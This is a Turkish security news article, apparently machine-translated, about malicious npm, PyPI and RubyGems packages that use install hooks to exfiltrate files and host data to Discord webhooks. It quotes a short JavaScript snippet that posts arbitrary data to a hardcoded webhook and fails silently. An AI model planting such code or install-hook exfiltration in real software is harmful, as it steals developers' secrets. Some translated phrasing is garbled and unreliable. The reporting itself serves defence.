Siber suçlular ortak kullanım için yeni bir yol keşfetti Discord web kancaları popüler dil ekosistemlerinde yedek komuta ve kontrol (C2) kanalları olarak.
Geleneksel C2 sunucularının aksine web kancaları, yasal HTTPS trafiğine sorunsuz bir şekilde karışan ücretsiz, düşük profilli sızıntı sunar.
Geçtiğimiz ay boyunca, npm, PyPI ve RubyGems’teki kötü amaçlı paketler, hassas dosyaları ve telemetriyi geliştirici makinelerden ve sürekli entegrasyon ortamlarından sessizce sızdırdı.
İlk gözlemler görünüşte zararsız bir npm modülünü içeriyordu. mysql-dumpdiscord. Yükleme veya yürütme sonrasında, yapılandırma ve ortam dosyalarını araştırır; config[.]json, [.]envVe ayarlar[.]js— içeriklerini okur ve ardından sabit kodlu bir Discord web kancası URL’sine bir HTTP POST yayınlar.
Bir dize sabiti olarak yerleştirilmiş, saldırgan tarafından kontrol edilen web kancası, her dosyanın içeriğini alır ve daha uzun dosyalar, Discord’un mesajlaşma sınırlarına uyacak şekilde 1.900 karaktere kısaltılır.
Socket.dev analistleri bu tekniği ancak ağ izleme POST isteklerinde olağandışı bir artış tespit ettikten sonra tanımladılar. discord[.]com/ api/ webhooks/....
Daha fazla araştırma, yetkiliden yararlanan ikinci bir npm kavram kanıtını ortaya çıkardı discord.js kütüphane:-
const { WebhookClient } = require ('discord.js');
module.exports = async function send (messages) {
try {
const client = new WebhookClient ({ url: 'https://discord.com/api/webhooks/1323713674971713676/…' });
await client.send (messages.join(' '));
} catch (e) {
// Silent failure
}
};Bu minimalist yaklaşım, olağandışı etki alanlarını veya imzaları arayan ana bilgisayar tabanlı algılamayı atlayarak, işleve iletilen herhangi bir dizeyi bir C2 mesajına dönüştürür.
Ekosistemlerde tehdit aktörleri benzer taktikleri benimsiyor. Python’un PyPI kayıt defterinde şu adla adlandırılan bir paket malinsx geçersiz kılar install komuta etmek setuptools.
Sırasında pip installVietnamca bir bildirim mesajı serileştiriyor (“Bazıları maladicus paketini pip aracılığıyla yükledi!”) ve bunu Discord web kancasına gönderiyor.
Herhangi bir ağ hatası yakalanıp göz ardı edilir ve yasal kurulum süreci engellenmeden devam eder.
RubyGems’te değiştirilmiş bir versiyon SQLcommenterrails gibi ana bilgisayar meta verilerini toplar / etc / passwd içerikleri, DNS sunucularını, geçerli kullanıcıyı ve genel IP’yi yönetir ve bunu çok satırlı bir JSON verisi olarak biçimlendirir.
Bu daha sonra HTTPS üzerinden bir web kancasına POST edilir. Hata işleme sessizdir ve gem kurulumunda kesinti yaşanmamasını sağlar.
Enfeksiyon Mekanizması
Bu paketler istismar ediliyor yükleme zamanı kancaları kalıcılık ve gizlilik elde etmek için. Yükleyici komutlarını geçersiz kılarak (install[.]run Python’da gemspec kancaları, Ruby’de gemspec kancaları), kötü amaçlı kod, ana bilgisayarın güvenlik kontrolleri çalışma zamanı davranışlarına ilişkin uyarı vermeden önce yürütülür.
Bu erken aşamadaki yürütme, kod analizi veya uç nokta koruması devreye girmeden çok önce sırların dışarı sızması anlamına gelir.
Üstelik Discord’un altyapısını kullanmak, trafiğin izin verilen statik izin verilenler listelerinden şüphelenilmesini önler. discord[.]com güvenilir bir etki alanını gizli bir veri hattına dönüştürerek iş işbirliği için.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
